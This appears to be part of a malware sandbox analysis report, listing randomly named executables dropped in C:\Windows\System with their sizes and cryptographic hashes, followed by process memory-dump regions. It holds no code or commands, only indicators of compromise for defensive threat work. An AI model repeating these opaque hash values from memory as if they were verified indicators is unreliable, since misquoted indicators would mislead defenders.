a46e0028eda2d6cb01c96740e0d4e587d2108916f702676f78c5eacdcab7e642

SHA512
28c80d09a535b220de71fc3964e86d8dbe5ae77935bb0903fb7a3ee7528a9b0e8c7aabf365eec1e00565cbd2b58a90860e65f6002f63ca43b9fc258b627f9915

Download Submit
C:\Windows\System\uiehumX.exe

Filesize
8B

MD5
68703642e5faeaf00b4b9f791a04a7f5

SHA1
2e8f5d51bda54b6b227caed2cb4535020c7a482c

SHA256
76bc446e18daed4e6417440c778e757728762c893f014de08ffa5f0fe98668bd

SHA512
0c1919485a30576b5fdf963204dc04b356f524c23dfb4ffaecdbb8a8ea4a0993cf3ac05bee011edf07b5b637ac7455499983eac22f5cdd87cd869e7a046115a5

Download Submit
C:\Windows\System\uopfwFE.exe

Filesize
3.1MB

MD5
02933b4629341e94a91b3e1c027affa6

SHA1
3ee9ba647f5b083b119d3e523baec412ea9be32b

SHA256
21d0d8aa217f3e87c4307e105e0c5951c1a6855e2fe8251305a42e21d4fdad9e

SHA512
7f45ad642842f1d93867db6831a32344b9dba5eb2c4ef3f90bd627ab0882b21c9250cdc803a3d08aef1495833fec4664b29b5206c286a2bdaead7131f5822bad

Download Submit
C:\Windows\System\vEsShlp.exe

Filesize
3.1MB

MD5
81a52da51bec4812bbc708806d79d9c5

SHA1
4b19b4ccd29d1f9b2b12700f39e3c58ce79e421f

SHA256
c6b6b3f13676b437112607ec10182184c061585e595db485b2504c311ad8cc0a

SHA512
c8dc99af91e76456b8f79b63955f1a6452fe0b96cae7b71f8932cb63587f15b6649aa1f023a8b837622ce08c2468cc34d1ccf81e08620ea4ce31d201a70bbc47

Download Submit
C:\Windows\System\vWPiBwM.exe

Filesize
3.1MB

MD5
81af9116ef0ebd28b6c859e09a122cc5

SHA1
74cf44382ad9d48f6c844e415df7b016270f3d58

SHA256
691853bb414aa375529456e7642b9ae9da74d0b193d621a5606bd73ab7a49f4c

SHA512
3198968bceb389e60240fed31ddc5362b09e8be2f2250e5f038fc7743f4a3eed292205d75d4d018374c51f227d4fc6ff2d40bed656c9253b15d75c8fd3771ebc

Download Submit
C:\Windows\System\xaNIySo.exe

Filesize
3.1MB

MD5
313e11f8dc4f1bcf11694628e15cb468

SHA1
5e42b9176ca6f3de3df59d28b28bfa99e4f31dc9

SHA256
eb89ef402ffa900a6cd8a023278c17d3dacae5554f5c051dd921354c8d842003

SHA512
9e8fc2abe5dda226548211a9618bda1d23977ecc277900b492d5e4c317ae407e32ef65faacd742af67590feddc3ab868e20beceb1a52051860229c176ada2c11

Download Submit
memory/932-106-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp

Filesize
4.0MB

Download
memory/932-2086-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp

Filesize
4.0MB

Download
memory/932-2065-0x00007FF75AFB0000-0x00007FF75B3A6000-memory.dmp

Filesize
4.0MB

Download
memory/1000-130-0x00007FF759820000-0x00007FF759C16000-memory.dmp

Filesize
4.0MB

Download
memory/1000-2067-0x00007FF759820000-0x00007FF759C16000-memory.dmp

Filesize
4.0MB

Download
memory/1000-2090-0x00007FF759820000-0x00007FF759C16000-memory.dmp

Filesize
4.0MB

Download
memory/1256-192-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp

Filesize
4.0MB

Download
memory/1256-2093-0x00007FF7FEFC0000-0x00007FF7FF3B6000-memory.dmp

Filesize
4.0MB

Download
memory/1440-148-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp

Filesize
4.0MB

Download
memory/1440-2069-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp

Filesize
4.0MB

Download
memory/1440-2088-0x00007FF6B8360000-0x00007FF6B8756000-memory.dmp

Filesize
4.0MB

Download
memory/1488-109-0x00007FF738920000-0x00007FF738D16000-memory.dmp

Filesize
4.0MB

Download
memory/1488-2083-0x00007FF738920000-0x00007FF738D16000-memory.dmp

Filesize
4.0MB

Download
memory/2096-2070-0x00007FF778360000-0x00007FF778756000-memory.dmp

Filesize
4.0MB

Download
memory/2096-2091-0x00007FF778360000-0x00007FF778756000-memory.dmp

Filesize
4.0MB

Download
memory/2096-163-0x00007FF778360000-0x00007FF778756000-memory.dmp

Filesize
4.0MB

Download
memory/2160-2075-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp

Filesize
4.0MB

Download
memory/2160-44-0x00007FF79FB20000-0x00007FF79FF16000-memory.dmp

Filesize
4.0MB

Download
memory/2192-2066-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp

Filesize
4.0MB

Download
memory/2192-2087-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp

Filesize
4.0MB

Download
memory/2192-110-0x00007FF7DEDE0000-0x00007FF7DF1D6000-memory.dmp

Filesize
4.0MB

Download
memory/2196-102-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp

Filesize
4.0MB

Download
memory/2196-2079-0x00007FF7E2F50000-0x00007FF7E3346000-memory.dmp

Filesize
4.0MB

Download
memory/2228-2073-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp

Filesize
4.0MB

Download
memory/2228-108-0x00007FF727BE0000-0x00007FF727FD6000-memory.dmp

Filesize
4.0MB

Download
memory/2292-1556-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp

Filesize
4.0MB

Download
memory/2292-2071-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp

Filesize
4.0MB

Download
memory/2292-17-0x00007FF7A48A0000-0x00007FF7A4C96000-memory.dmp

Filesize
4.0MB

Download
memory/2324-2080-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp

Filesize
4.0MB

Download
memory/2324-101-0x00007FF617BE0000-0x00007FF617FD6000-memory.dmp

Filesize
4.0MB

Download
memory/2440-104-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp

Filesize
4.0MB

Download
memory/2440-2077-0x00007FF6FE4D0000-0x00007FF6FE8C6000-memory.dmp

Filesize
4.0MB

Download
memory/2720-103-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp

Filesize
4.0MB

Download
memory/2720-2078-0x00007FF6FAD30000-0x00007FF6FB126000-memory.dmp

Filesize
4.0MB

Download
memory/2860-8-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp

Filesize
4.0MB

Download
memory/2860-2072-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp

Filesize
4.0MB

Download
memory/2860-1824-0x00007FF7F36B0000-0x00007FF7F3AA6000-memory.dmp

Filesize
4.0MB

Download
memory/2900-2068-0x00007FF66B510000-0x00007FF66B906000-memory.dmp

Filesize
4.0MB

Download
memory/2900-2094-0x00007FF66B510000-0x00007FF66B906000-memory.dmp

Filesize
4.0MB

Download
memory/2900-133-0x00007FF66B510000-0x00007FF66B906000-memory.dmp

Filesize
4.0MB

Download
memory/2920-2084-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp

Filesize
4.0MB

Download
memory/2920-99-0x00007FF730A00000-0x00007FF730DF6000-memory.dmp

Filesize
4.0MB

Download
memory/3176-25-0x00007FF71F450000-0x00007FF71F846000-memory.dmp

Filesize
4.0MB

Download
memory/3176-2076-0x00007FF71F450000-0x00007FF71F846000-memory.dmp

Filesize
4.0MB

Download
memory/3176-1830-0x00007FF71F450000-0x00007FF71F846000-memory.dmp

Filesize
4.0MB

Download
memory/3188-160-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp

Filesize
4.0MB

Download
memory/3188-2089-0x00007FF7535C0000-0x00007FF7539B6000-memory.dmp

Filesize
4.0MB

Download
memory/3248-95-0x000001A645B50000-0x000001A645B72000-memory.dmp

Filesize
136KB

Download
memory/3248-235-0x000001A6468D0000-0x000001A647076000-memory.dmp

Filesize
7.6MB

Download
memory/3748-2081-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp

Filesize
4.0MB

Download
memory/3748-100-0x00007FF61D400000-0x00007FF61D7F6000-memory.dmp

Filesize
4.0MB

Download
memory/3940-49-0x00007FF610130000-0x00007FF610526000-memory.dmp

Filesize
4.0MB

Download
memory/3940-2064-0x00007FF610130000-0x00007FF610526000-memory.dmp

Filesize
4.0MB

Download
memory/3940-2082-0x00007FF610130000-0x00007FF610526000-memory.dmp

Filesize
4.0MB

Download
memory/4572-2074-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp

Filesize
4.0MB

Download
memory/4572-107-0x00007FF66C4D0000-0x00007FF66C8C6000-memory.dmp

Filesize
4.0MB

Download
memory/4584-1-0x0000020D0EF30000-0x0000020D0EF40000-memory.dmp

Filesize
64KB

Download
memory/4584-1550-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp

Filesize
4.0MB

Download
memory/4584-0-0x00007FF65B740000-0x00007FF65BB36000-memory.dmp

Filesize
4.0MB

Download
memory/4864-105-0x00007FF790250000-0x00007FF790646000-memory.dmp

Filesize
4.0MB

Download
memory/4864-2085-0x00007FF790250000-0x00007FF790646000-memory.dmp

Filesize
4.0MB

Download
memory/4940-184-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp

Filesize
4.0MB

Download
memory/4940-2092-0x00007FF6E1EF0000-0x00007FF6E22E6000-memory.dmp

Filesize
4.0MB

Download